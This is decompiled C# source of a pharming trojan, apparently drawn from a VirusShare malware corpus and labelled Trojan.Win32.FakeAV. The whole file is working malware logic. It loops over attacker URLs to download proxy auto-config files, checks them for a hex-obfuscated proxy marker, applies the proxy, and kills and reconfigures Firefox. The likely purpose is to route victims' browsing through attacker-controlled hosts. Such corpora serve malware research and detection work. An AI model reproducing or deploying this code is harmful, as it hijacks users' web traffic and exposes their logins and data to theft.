// Decompiled with JetBrains decompiler // Type: Pharming_V4.atproxy // Assembly: Pharming V4, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 0A0AA727-6E9B-45EB-9818-CBBF4207AD4A // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.FakeAV.msyh-d3f833cca57e8fd32da1564163086307e943e07f01fc02218e28a85509c2cfe2.exe using Microsoft.VisualBasic.CompilerServices; using System; using System.Diagnostics; using System.IO; using System.Net; using System.Threading; namespace Pharming_V4 { [StandardModule] internal sealed class atproxy { public static string pac1; public static string pac2; public static string pac3; public static string pac4; public static string pac5; public static string pacfinal; public static void atproxy() { string tempPath = Path.GetTempPath(); Pharming_V4.atproxy.pac1 = "http://www.tudolinux.com/p.txt"; Pharming_V4.atproxy.pac2 = "http://www.tudolinux.com/p.txt"; Pharming_V4.atproxy.pac3 = "http://www.tudominerim.com/p.txt"; Pharming_V4.atproxy.pac4 = "http://www.tudominerim.com/p.txt"; Pharming_V4.atproxy.pac5 = "http://www.tudominerim.com/p.txt"; Random random = new Random(); while (true) { do { int num; do { num = random.Next(1, 5); if (num == 1) { try { new WebClient().DownloadFile(Pharming_V4.atproxy.pac1, tempPath + "\\config.jsp"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (System.IO.File.Exists(tempPath + "\\config.jsp")) { StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp"); string end = streamReader.ReadToEnd(); streamReader.Close(); if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d")) { Module1.a(Pharming_V4.atproxy.pac1); Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac1; Process[] processesByName = Process.GetProcessesByName("firefox"); int index = 0; while (index < processesByName.Length) { processesByName[index].Kill(); checked { ++index; } } firefox.firefox(); Thread.Sleep(1000000); } else Console.WriteLine("Atualizado"); } } else if (num == 2) { try { new WebClient().DownloadFile(Pharming_V4.atproxy.pac2, tempPath + "\\config.jsp"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (System.IO.File.Exists(tempPath + "\\config.jsp")) { StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp"); string end = streamReader.ReadToEnd(); streamReader.Close(); if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d")) { Module1.a(Pharming_V4.atproxy.pac2); Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac2; Process[] processesByName = Process.GetProcessesByName("firefox"); int index = 0; while (index < processesByName.Length) { processesByName[index].Kill(); checked { ++index; } } firefox.firefox(); Thread.Sleep(1000000); } else Console.WriteLine("Atualizado"); } } else if (num == 3) { try { new WebClient().DownloadFile(Pharming_V4.atproxy.pac3, tempPath + "\\config.jsp"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (System.IO.File.Exists(tempPath + "\\config.jsp")) { StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp"); string end = streamReader.ReadToEnd(); streamReader.Close(); if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d")) { Module1.a(Pharming_V4.atproxy.pac3); Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac3; Process[] processesByName = Process.GetProcessesByName("firefox"); int index = 0; while (index < processesByName.Length) { processesByName[index].Kill(); checked { ++index; } } firefox.firefox(); Thread.Sleep(1000000); } else Console.WriteLine("Atualizado"); } } else if (num == 4) { try { new WebClient().DownloadFile(Pharming_V4.atproxy.pac4, tempPath + "\\config.jsp"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } if (System.IO.File.Exists(tempPath + "\\config.jsp")) { StreamReader streamReader = new StreamReader(tempPath + "\\config.jsp"); string end = streamReader.ReadToEnd(); streamReader.Close(); if (end.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d")) { Module1.a(Pharming_V4.atproxy.pac4); Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac4; Process[] processesByName = Process.GetProcessesByName("firefox"); int index = 0; while (index < processesByName.Length) { processesByName[index].Kill(); checked { ++index; } } firefox.firefox(); Thread.Sleep(1000000); } else Console.WriteLine("Atualizado"); } } } while (num != 5); try { new WebClient().DownloadFile(Pharming_V4.atproxy.pac5, tempPath + "\\config.jsp"); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } while (!System.IO.File.Exists(tempPath + "\\config.jsp")); StreamReader streamReader1 = new StreamReader(tempPath + "\\config.jsp"); string end1 = streamReader1.ReadToEnd(); streamReader1.Close(); if (end1.Contains("PROXY \\x77\\x77\\x77\\x2e\\x74\\x75\\x64\\x6f\\x6c\\x69\\x6e\\x75\\x78\\x2e\\x63\\x6f\\x6d")) { Module1.a(Pharming_V4.atproxy.pac5); Pharming_V4.atproxy.pacfinal = Pharming_V4.atproxy.pac5; Process[] processesByName = Process.GetProcessesByName("firefox"); int index = 0; while (index < processesByName.Length) { processesByName[index].Kill(); checked { ++index; } } firefox.firefox(); Thread.Sleep(1000000); } else Console.WriteLine("Atualizado"); } } } }